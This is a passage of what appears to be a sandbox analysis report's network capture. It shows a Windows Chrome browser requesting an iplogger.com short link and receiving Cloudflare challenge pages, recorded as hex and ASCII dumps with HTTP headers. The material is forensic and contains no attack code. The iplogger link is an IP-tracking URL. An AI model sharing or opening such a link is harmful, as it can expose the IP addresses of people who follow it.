                                                                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:09:21 UTC1285INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:21 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                                Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                X-Content-Options: nosniff
                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                cf-mitigated: challenge
                                                                                                                                                                                                                                                2024-10-03 14:09:21 UTC698INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 50 67 4d 6f 65 45 2f 5a 48 4f 4b 33 78 74 70 45 70 78 37 72 4c 38 76 51 6b 75 50 62 4d 50 41 64 78 68 77 6b 50 67 64 66 39 31 75 76 39 68 78 69 58 74 76 48 61 5a 6d 53 6d 68 69 65 2f 2f 74 4a 36 33 33 51 37 48 48 69 6e 63 6f 61 58 34 64 64 59 4d 41 61 50 45 65 63 75 39 74 30 35 47 4f 67 46 39 72 42 2b 46 33 5a 4b 77 45 3d 24 50 31 64 42 5a 34 4c 41 4f 39 63 44 59 36 6c 72 39 66 39 2b 35 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                                                                                                                                                                                                                                Data Ascii: cf-chl-out: PgMoeE/ZHOK3xtpEpx7rL8vQkuPbMPAdxhwkPgdf91uv9hxiXtvHaZmSmhie//tJ633Q7HHincoaX4ddYMAaPEecu9t05GOgF9rB+F3ZKwE=$P1dBZ4LAO9cDY6lr9f9+5w==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                                                                                                                                                                                                                                2024-10-03 14:09:21 UTC1369INData Raw: 32 34 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                                                                                                                                                                                                                Data Ascii: 24de<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                                                                                                                                                                                                                                2024-10-03 14:09:21 UTC1369INData Raw: 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 40 6d
                                                                                                                                                                                                                                                Data Ascii: uMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-repeat;background-size:contain;padding-left:34px}@m
                                                                                                                                                                                                                                                2024-10-03 14:09:21 UTC1369INData Raw: 78 58 55 35 50 5a 61 75 57 46 34 64 61 58 44 73 66 44 73 78 36 63 54 51 73 6f 31 79 6d 6b 35 65 6f 35 79 78 46 4b 67 77 49 6d 45 49 63 6b 55 77 43 33 48 36 41 34 43 38 41 64 4d 5a 51 47 4e 72 34 76 79 33 47 73 4c 51 37 50 2e 54 48 4d 48 61 34 6e 78 4d 71 51 74 4e 4f 48 5a 58 69 57 4a 4b 68 4e 75 53 4f 6b 72 76 6b 74 6e 6e 6b 78 66 38 66 37 76 58 66 62 35 56 6d 72 67 4d 59 34 55 36 4a 4c 42 37 46 58 7a 4a 46 2e 6b 68 4f 50 33 53 73 49 35 6f 51 62 39 45 4b 48 61 7a 68 56 5f 4d 52 37 63 2e 68 70 6c 41 47 6a 46 57 73 67 75 44 42 42 79 38 4e 67 46 45 6e 53 46 69 50 76 6a 77 64 63 65 42 72 46 31 4c 67 48 37 53 6d 39 34 4f 59 39 33 41 37 7a 4b 32 61 6b 6a 6e 39 4c 5f 30 45 6b 41 55 6f 74 5f 4a 46 47 45 77 42 70 45 6d 72 6f 42 71 79 57 4a 4e 76 4c 74 42 58 56 57
                                                                                                                                                                                                                                                Data Ascii: xXU5PZauWF4daXDsfDsx6cTQso1ymk5eo5yxFKgwImEIckUwC3H6A4C8AdMZQGNr4vy3GsLQ7P.THMHa4nxMqQtNOHZXiWJKhNuSOkrvktnnkxf8f7vXfb5VmrgMY4U6JLB7FXzJF.khOP3SsI5oQb9EKHazhV_MR7c.hplAGjFWsguDBBy8NgFEnSFiPvjwdceBrF1LgH7Sm94OY93A7zK2akjn9L_0EkAUot_JFGEwBpEmroBqyWJNvLtBXVW
                                                                                                                                                                                                                                                2024-10-03 14:09:21 UTC1369INData Raw: 52 4a 72 59 71 55 68 76 42 74 58 73 55 48 34 70 50 4f 67 42 4d 69 42 63 78 43 6d 56 4d 57 33 63 50 70 31 32 5a 7a 63 76 70 31 38 6d 71 7a 55 39 53 43 32 66 76 58 5f 5a 6f 78 46 52 79 56 55 39 73 69 70 48 52 47 39 6c 38 72 63 51 62 6d 4b 66 4e 6a 51 49 6a 6d 69 50 64 4d 4c 79 50 59 4a 72 64 72 32 59 6e 41 58 45 49 44 42 56 44 41 51 5a 73 4b 70 66 77 65 55 30 34 44 48 32 4f 38 4e 38 7a 47 59 74 7a 63 4d 73 36 55 6e 41 61 48 35 75 70 36 58 6d 2e 58 36 78 4d 33 68 67 54 4c 4c 6a 43 38 6a 56 6f 63 68 6a 54 4c 74 73 53 53 33 79 4e 30 48 79 37 73 35 44 4f 45 4c 79 77 61 5f 33 71 52 57 53 47 39 6e 66 79 66 46 73 71 77 30 72 35 37 42 36 4d 57 41 44 65 41 45 49 38 74 7a 46 48 4d 67 70 72 6b 51 4d 65 4d 33 51 59 51 58 53 4b 30 35 49 6a 64 39 69 79 52 36 77 5a 65 64
                                                                                                                                                                                                                                                Data Ascii: RJrYqUhvBtXsUH4pPOgBMiBcxCmVMW3cPp12Zzcvp18mqzU9SC2fvX_ZoxFRyVU9sipHRG9l8rcQbmKfNjQIjmiPdMLyPYJrdr2YnAXEIDBVDAQZsKpfweU04DH2O8N8zGYtzcMs6UnAaH5up6Xm.X6xM3hgTLLjC8jVochjTLtsSS3yN0Hy7s5DOELywa_3qRWSG9nfyfFsqw0r57B6MWADeAEI8tzFHMgprkQMeM3QYQXSK05Ijd9iyR6wZed
                                                                                                                                                                                                                                                2024-10-03 14:09:21 UTC1369INData Raw: 44 56 69 36 62 64 73 74 43 57 73 4f 4e 34 49 5a 33 59 32 71 34 32 6b 73 33 70 34 75 6f 39 42 42 63 2e 63 5a 75 79 6e 66 34 43 78 44 6c 43 76 4d 51 43 6a 38 69 6d 75 4e 39 71 61 2e 78 59 4e 55 53 53 73 75 50 4f 67 4a 36 58 69 63 77 6d 6e 5f 65 6e 45 76 35 31 51 68 6e 31 33 47 56 67 34 53 51 55 4e 6b 6e 57 36 65 79 4e 6b 32 52 32 73 64 53 66 75 5f 67 34 68 4e 36 6f 48 64 61 69 43 75 79 63 4e 43 39 69 4a 59 5a 36 54 57 4a 42 4e 32 51 58 4b 51 30 42 47 76 2e 69 75 6c 4f 6e 5a 4c 4c 44 4f 4e 5a 4d 32 50 33 74 66 4e 75 4e 41 47 55 34 54 6d 76 36 4f 30 43 75 35 45 79 64 55 57 75 6f 49 2e 4d 48 50 47 33 51 43 30 61 78 64 6b 4b 44 72 4b 38 32 52 7a 71 61 43 77 72 61 4b 6b 31 32 62 74 44 35 36 36 65 67 76 4b 53 61 62 62 62 69 4e 75 50 2e 4b 31 77 64 71 33 51 38 55
                                                                                                                                                                                                                                                Data Ascii: DVi6bdstCWsON4IZ3Y2q42ks3p4uo9BBc.cZuynf4CxDlCvMQCj8imuN9qa.xYNUSSsuPOgJ6Xicwmn_enEv51Qhn13GVg4SQUNknW6eyNk2R2sdSfu_g4hN6oHdaiCuycNC9iJYZ6TWJBN2QXKQ0BGv.iulOnZLLDONZM2P3tfNuNAGU4Tmv6O0Cu5EydUWuoI.MHPG3QC0axdkKDrK82RzqaCwraKk12btD566egvKSabbbiNuP.K1wdq3Q8U
                                                                                                                                                                                                                                                2024-10-03 14:09:21 UTC1369INData Raw: 2e 34 61 36 48 4d 53 75 30 59 62 72 64 6e 4d 65 37 63 4a 4c 72 65 44 6c 5a 4c 59 37 48 78 30 57 34 4c 44 39 30 77 64 2e 45 76 47 65 45 39 64 35 6b 48 4b 68 4d 65 7a 5a 38 73 33 46 74 36 2e 31 31 49 51 76 4e 47 54 6b 69 77 6f 70 65 6c 43 6d 36 66 4b 6c 55 71 44 7a 46 62 48 58 2e 70 47 55 43 66 48 6f 70 50 63 4d 65 32 37 66 50 32 65 32 31 6f 38 6b 7a 42 6a 59 67 6b 74 54 77 44 31 70 6d 6c 56 7a 35 79 43 4b 58 44 4b 37 77 74 56 50 57 44 78 68 61 51 30 74 76 52 33 70 31 64 58 6e 5f 54 4a 44 59 68 37 42 42 78 63 5a 4b 4c 6b 6d 63 36 5f 50 55 4a 30 6a 34 76 6b 38 79 62 5f 75 52 67 56 4c 70 64 45 68 4f 62 6d 42 38 78 45 6e 39 4b 58 48 6d 36 4d 5f 41 75 57 64 36 54 35 30 47 53 4b 67 65 6d 55 4a 4a 79 33 66 4f 4a 51 6b 6d 51 62 39 39 74 66 78 67 6a 70 39 33 30 50
                                                                                                                                                                                                                                                Data Ascii: .4a6HMSu0YbrdnMe7cJLreDlZLY7Hx0W4LD90wd.EvGeE9d5kHKhMezZ8s3Ft6.11IQvNGTkiwopelCm6fKlUqDzFbHX.pGUCfHopPcMe27fP2e21o8kzBjYgktTwD1pmlVz5yCKXDK7wtVPWDxhaQ0tvR3p1dXn_TJDYh7BBxcZKLkmc6_PUJ0j4vk8yb_uRgVLpdEhObmB8xEn9KXHm6M_AuWd6T50GSKgemUJJy3fOJQkmQb99tfxgjp930P
                                                                                                                                                                                                                                                2024-10-03 14:09:21 UTC1232INData Raw: 52 41 4b 70 2f 6d 6c 2b 69 38 6a 42 47 38 61 38 6c 45 4c 32 44 27 2c 74 3a 20 27 4d 54 63 79 4e 7a 6b 32 4e 44 55 32 4d 53 34 77 4d 44 41 77 4d 44 41 3d 27 2c 63 54 3a 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 44 61 74 65 2e 6e 6f 77 28 29 20 2f 20 31 30 30 30 29 2c 6d 3a 20 27 6f 56 71 46 4c 5a 43 39 4e 59 6e 6d 46 56 30 76 63 78 42 30 4b 64 66 74 54 6c 6e 72 70 39 53 52 49 38 67 6b 50 57 54 34 73 49 34 3d 27 2c 69 31 3a 20 27 79 33 4d 48 69 58 36 61 46 52 2b 42 34 58 5a 6b 75 4b 54 6f 5a 67 3d 3d 27 2c 69 32 3a 20 27 4b 4e 4e 2b 76 66 2f 4e 65 30 4b 39 78 4f 4c 47 75 6f 32 6b 6e 51 3d 3d 27 2c 7a 68 3a 20 27 72 6e 50 4c 59 79 67 42 78 5a 77 43 2f 61 65 51 61 74 5a 6e 6c 39 4a 54 46 63 51 62 5a 64 44 64 4e 50 41 55 41 6c 33 59 49 4f 30 3d 27 2c 75 68 3a 20 27
                                                                                                                                                                                                                                                Data Ascii: RAKp/ml+i8jBG8a8lEL2D',t: 'MTcyNzk2NDU2MS4wMDAwMDA=',cT: Math.floor(Date.now() / 1000),m: 'oVqFLZC9NYnmFV0vcxB0KdftTlnrp9SRI8gkPWT4sI4=',i1: 'y3MHiX6aFR+B4XZkuKToZg==',i2: 'KNN+vf/Ne0K9xOLGuo2knQ==',zh: 'rnPLYygBxZwC/aeQatZnl9JTFcQbZdDdNPAUAl3YIO0=',uh: '
                                                                                                                                                                                                                                                2024-10-03 14:09:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                4192.168.2.64971635.190.80.14436088C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:22 UTC525OUTOPTIONS /report/v4?s=pxV1pun6Odl5bdgZBWOVUjaqoZSnytH0ktSOuDwxstcebwZJv7QxCFrA975IpNydkNjpmdlUL%2BeEqF5Mvm8Ff7RkSMM9uw40RxJXZZeeBq6mD8njDcipAzlQbMKcRqU%3D HTTP/1.1
                                                                                                                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Origin: https://iplogger.com
                                                                                                                                                                                                                                                Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:09:22 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                access-control-max-age: 86400
                                                                                                                                                                                                                                                access-control-allow-methods: OPTIONS, POST
                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                access-control-allow-headers: content-type, content-length
                                                                                                                                                                                                                                                date: Thu, 03 Oct 2024 14:09:21 GMT
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                5192.168.2.649717172.67.188.1784436088C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:22 UTC933OUTGET /1KhnJ4 HTTP/1.1
                                                                                                                                                                                                                                                Host: iplogger.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                sec-ch-ua-model: ""
                                                                                                                                                                                                                                                sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:09:22 UTC1285INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:22 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                                Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                X-Content-Options: nosniff
                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                cf-mitigated: challenge
                                                                                                                                                                                                                                                2024-10-03 14:09:22 UTC702INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 4a 5a 41 56 33 36 31 72 6a 47 71 4e 66 65 73 34 37 4e 39 34 64 6b 32 37 76 30 36 48 52 70 49 47 2b 38 4e 46 61 74 79 45 75 57 75 38 45 31 30 48 4e 36 4c 64 76 4d 32 74 6a 55 4b 70 45 30 2f 67 63 41 4c 2f 63 46 74 4b 72 71 35 69 54 55 7a 43 4e 4f 6e 57 4e 54 2b 30 38 2b 73 49 64 6b 55 57 2b 2f 4a 6f 6e 6b 2f 33 4b 7a 49 3d 24 54 51 6f 62 73 67 6d 4c 46 6c 43 62 62 74 4e 38 64 69 77 42 51 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                                                                                                                                                                                                                                Data Ascii: cf-chl-out: JZAV361rjGqNfes47N94dk27v06HRpIG+8NFatyEuWu8E10HN6LdvM2tjUKpE0/gcAL/cFtKrq5iTUzCNOnWNT+08+sIdkUW+/Jonk/3KzI=$TQobsgmLFlCbbtN8diwBQw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                                                                                                                                                                                                                                2024-10-03 14:09:22 UTC1369INData Raw: 32 35 37 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                                                                                                                                                                                                                Data Ascii: 2570<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                                                                                                                                                                                                                                2024-10-03 14:09:22 UTC1369INData Raw: 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 40 6d
                                                                                                                                                                                                                                                Data Ascii: uMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-repeat;background-size:contain;padding-left:34px}@m
                                                                                                                                                                                                                                                2024-10-03 14:09:22 UTC1369INData Raw: 56 32 30 73 5f 31 42 58 73 79 32 65 75 66 6d 47 32 6d 4e 7a 63 32 45 68 59 35 33 49 6b 6f 56 31 37 75 72 47 4c 61 42 5f 49 62 77 4e 72 6a 4e 6b 37 6d 54 68 4e 41 37 71 69 54 68 71 6e 4b 35 4f 41 59 6a 48 4c 66 4a 79 66 46 5a 5f 37 6b 68 74 5a 78 51 67 2e 66 55 63 55 57 51 71 34 4b 5a 57 57 6a 65 34 46 6b 59 4c 5a 57 4c 6c 4b 32 62 63 71 4d 4a 74 59 44 33 58 61 74 65 64 36 49 69 4f 6d 6e 74 66 59 2e 59 37 79 6b 46 62 56 72 36 75 39 42 55 66 68 70 4c 6c 4e 79 71 34 49 5f 57 51 54 53 70 71 45 56 6c 36 41 67 4c 4f 44 53 50 2e 6d 48 59 46 5a 6e 54 37 65 43 6c 55 4b 37 32 32 69 6e 43 77 41 46 4e 76 74 61 46 43 79 4f 66 6f 68 56 58 47 77 46 61 57 42 42 47 78 67 42 4c 59 53 77 56 6a 43 77 62 33 48 4a 52 56 73 66 6f 6b 63 46 54 6b 48 5a 49 76 6a 6c 61 32 57 43 38
                                                                                                                                                                                                                                                Data Ascii: V20s_1BXsy2eufmG2mNzc2EhY53IkoV17urGLaB_IbwNrjNk7mThNA7qiThqnK5OAYjHLfJyfFZ_7khtZxQg.fUcUWQq4KZWWje4FkYLZWLlK2bcqMJtYD3Xated6IiOmntfY.Y7ykFbVr6u9BUfhpLlNyq4I_WQTSpqEVl6AgLODSP.mHYFZnT7eClUK722inCwAFNvtaFCyOfohVXGwFaWBBGxgBLYSwVjCwb3HJRVsfokcFTkHZIvjla2WC8
